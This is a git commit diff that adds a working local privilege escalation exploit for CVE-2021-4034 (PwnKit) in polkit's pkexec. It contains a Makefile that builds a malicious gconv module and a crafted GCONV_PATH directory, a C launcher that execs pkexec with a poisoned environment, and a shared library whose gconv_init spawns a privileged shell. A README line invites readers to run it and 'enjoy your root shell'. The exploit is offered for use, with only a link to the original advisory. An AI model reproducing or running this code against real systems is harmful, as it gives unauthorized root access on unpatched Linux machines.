CVE-2021-4034
This commit is contained in:
parent
1dabffa709
commit
444257e5d9
19
Makefile
Normal file
19
Makefile
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
CFLAGS=-Wall
|
||||||
|
|
||||||
|
.PHONY: all
|
||||||
|
all: pwnkit.so cve-2021-4034 gconv-modules gconvpath
|
||||||
|
|
||||||
|
.PHONY: clean
|
||||||
|
clean:
|
||||||
|
rm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./
|
||||||
|
|
||||||
|
gconv-modules:
|
||||||
|
echo "module UTF-8// PWNKIT// pwnkit 1" > $@
|
||||||
|
|
||||||
|
.PHONY: gconvpath
|
||||||
|
gconvpath:
|
||||||
|
mkdir -p GCONV_PATH=.
|
||||||
|
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
||||||
|
|
||||||
|
pwnkit.so: pwnkit.c
|
||||||
|
$(CC) $(CFLAGS) --shared -fPIC -o $@ $<
|
@ -1,2 +1,6 @@
|
|||||||
# CVE-2021-4034
|
# CVE-2021-4034
|
||||||
CVE-2021-4034 1day
|
One day for the polkit privilege escalation exploit
|
||||||
|
|
||||||
|
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
|
||||||
|
|
||||||
|
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
|
||||||
|
16
cve-2021-4034.c
Normal file
16
cve-2021-4034.c
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
char * const args[] = {
|
||||||
|
NULL
|
||||||
|
};
|
||||||
|
char * const environ[] = {
|
||||||
|
"pwnkit.so:.",
|
||||||
|
"PATH=GCONV_PATH=.",
|
||||||
|
"SHELL=/lol/i/do/not/exists",
|
||||||
|
"CHARSET=PWNKIT",
|
||||||
|
NULL
|
||||||
|
};
|
||||||
|
return execve("/usr/bin/pkexec", args, environ);
|
||||||
|
}
|
15
pwnkit.c
Normal file
15
pwnkit.c
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void gconv(void) {
|
||||||
|
}
|
||||||
|
|
||||||
|
void gconv_init(void *step)
|
||||||
|
{
|
||||||
|
char * const args[] = { "/bin/sh", "-pi", NULL };
|
||||||
|
char * const environ[] = { "PATH=/bin:/usr/bin", NULL };
|
||||||
|
printf("%d %d\n", getuid(), geteuid());
|
||||||
|
execve(args[0], args, environ);
|
||||||
|
exit(0);
|
||||||
|
}
|
Loading…
Reference in New Issue
Block a user